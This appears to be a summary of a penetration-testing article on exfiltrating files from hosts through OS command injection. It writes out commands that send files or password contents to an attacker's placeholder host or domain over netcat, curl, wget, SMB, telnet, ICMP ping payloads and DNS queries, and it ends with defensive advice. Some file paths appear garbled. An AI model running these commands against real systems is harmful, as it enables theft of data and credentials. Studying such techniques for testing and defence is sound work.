Data Exfiltration Techniques via OS Command Injection Using Netcat, cURL, Wget, SMB, Telnet, ICMP and DNS

In penetration testing or CTF challenges, attackers often encounter applications that pass user‑provided text directly to system commands, creating OS command injection vulnerabilities. When input is not validated, an attacker can execute arbitrary commands on the target host.

The article first describes blind OS command injection, where no direct output is returned, and then outlines several practical exfiltration methods that do not require uploading a web shell.

Netcat : By running a Netcat listener on the attacker machine, the victim can redirect file contents to the listener, e.g., nc -l -p {port} {file/to/extract} or on Windows type {file to extract} | nc -L -p {port} .

cURL : Files can be posted to a remote server with cat /path/to/file | curl -F ":data=@-" http://xxx.xxx.xxx.xxxx:xxxx/test.txt . The same tool can upload via FTP using curl -T {path to file} ftp://xxx.xxx.xxx.xxx -user {username}:{password} .

WGET : Supports header injection and POST data. Examples include wget --header='EVIL:$(cat /datacret/password.txt)' http://xxx.xxx.xxx:xxx , wget --post-data exfil=`cat /datacretcretcode.txt` http://xxx.xxx.xxx.xxx:xxxx , and wget --post-file trophy.php http://xxx.xxx.xxx.xxx:xxxx .

SMB : Establish a network share and copy files with net use h: \\xxx.xxx.xxx.xxx\web /user:{username} {password} && copy {File to Copy} h:\{filename}.txt .

Telnet : Transfer a file to a listening host using telnet xxx.xxx.xxx.xxx {port} < {file to transfer} .

ICMP : When other tools are unavailable, data can be encoded in ICMP echo packets: cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done . Captured packets can be reassembled with Wireshark.

DNS : Each line of a file can be sent as a DNS query, e.g., cat /datacret/password.txt | while read exfil; do host $exfil.contextis.com 192.168.107.135; done , and the responses can be reconstructed into the original file.

The article concludes with defensive recommendations: avoid using user input as command arguments, whitelist valid inputs, perform regular code reviews and penetration tests, remove unnecessary tools (cURL, Wget, Netcat), run services with least‑privilege accounts, audit logs frequently, and enforce internal network traffic controls.